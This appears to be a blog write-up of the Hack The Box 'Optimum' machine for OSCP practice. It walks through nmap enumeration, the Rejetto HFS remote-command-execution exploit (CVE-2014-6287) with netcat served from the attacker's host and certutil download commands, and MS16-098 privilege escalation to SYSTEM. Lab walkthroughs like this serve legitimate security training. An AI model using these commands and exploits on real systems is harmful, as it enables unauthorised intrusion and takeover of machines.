Optimum

posted in TJNULL, Windows, Writeups on by

In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.

nmap scan

╭─kali@kali ~/HTB/optimum/results/10.10.10.8/scans 
╰─$ cat _quick_tcp_nmap.txt                                                                                                                                     
# Nmap 7.94 scan initiated Mon Oct 16 09:09:09 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/optimum/results/10.10.10.8/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/optimum/results/10.10.10.8/scans/xml/_quick_tcp_nmap.xml 10.10.10.8
Nmap scan report for 10.10.10.8
Host is up, received user-set (0.34s latency).
Scanned at 2023-10-16 09:09:16 EDT for 35s
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
|_http-server-header: HFS 2.3
|_http-title: HFS /
| http-methods: 
|_  Supported Methods: GET HEAD POST
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 16 09:09:51 2023 -- 1 IP address (1 host up) scanned in 41.67 seconds

Enumerating HttpFileServer httpd 2.3 HFS 2.3

------------------------------------------------------------------------------------------------------ ---------------------------------
Apple Mac OSX 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service                                                   | osx/dos/29454.txt
Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)                                                             | osx/dos/12375.c
Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure                                                         | osx/local/35488.c
Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation                                                  | osx/local/8266.sh
FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution                                                          | windows/remote/37985.py
HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)                                                         | windows/remote/49584.py
HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)                                                         | multiple/remote/48569.py
Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service                                                         | linux/dos/28895.txt
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)                                              | windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities                                                   | windows/remote/31056.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload                                                      | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)                                                 | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)                                                 | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution                                            | windows/webapps/34852.txt

using 39161

╭─kali@kali ~/HTB/optimum/results/10.10.10.8/exploit 
╰─$ searchsploit -m windows/webapps/39161
  Exploit: Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)
      URL: https://www.exploit-db.com/exploits/39161
     Path: /usr/share/exploitdb/exploits/windows/remote/39161.py
    Codes: CVE-2014-6287, OSVDB-111386
 Verified: True
File Type: Python script, ASCII text executable, with very long lines (540)
Copied to: /home/kali/HTB/optimum/results/10.10.10.8/exploit/39161.py


╭─kali@kali ~/HTB/optimum/results/10.10.10.8/exploit 
╰─$

comments on the exploit

# Description: You can use HFS (HTTP File Server) to send and receive files.
#              It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
#              It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over>

#Usage : python Exploit.py <Target IP address> <Target Port Number>

#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).
#          You may need to run it multiple times for success!

Modify the script with correct IP and port

        ip_addr = "10.10.14.31" #local IP address
        local_port = "443" # Local Port number

serve nc

39161.py  49125.py  mini2-reverse.ps1  mini-reverse.ps1  nc.exe  results
╭─kali@kali ~/HTB/optimum 
╰─$ serve 80  

Starting HTTP server on port 80...

====================================
certutil -urlcache -f http://10.10.14.31:80/file_to_download.txt C:\path\where\you\lile.txt
Invoke-WebRequest -Uri http://10.10.14.31:80/file_to_download.txt -OutFile C:\path\lile.txt
====================================

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Start listener and run exploit

kali@kali ~/HTB/optimum 
╰─$ python2.7 39161.py 10.10.10.8 80
╭─kali@kali ~/HTB/optimum 
╰─$ python2.7 39161.py 10.10.10.8 80
╭─kali@kali ~/HTB/optimum 
╰─$

we get shell

do a sysinfo and copy to text file then check with exploit suggester

╭─kali@kali ~/HTB/optimum/Windows-Exploit-Suggester ‹master●› 
╰─$ python2.7 ./windows-exploit-suggester.py --database 2023-10-18-mssb.xls  --systeminfo sys.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file

we see this that we can try

MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*]   https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)

We upload the exe to the machine and run it and we get admin

C:\Users\Public\Downloads>dir	
dir
 Volume in drive C has no label.
 Volume Serial Number is EE82-226D

 Directory of C:\Users\Public\Downloads

26/10/2023  03:27 ��    <DIR>          .
26/10/2023  03:27 ��    <DIR>          ..
26/10/2023  03:27 ��           560.128 41020.exe
               1 File(s)        560.128 bytes
               2 Dir(s)   5.683.875.840 bytes free

C:\Users\Public\Downloads>41020.exe
41020.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\Public\Downloads>whoamia
whoamia
'whoamia' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Public\Downloads>whoami /all
whoami /all

USER INFORMATION
----------------

User Name           SID     
=================== ========
nt authority\system S-1-5-18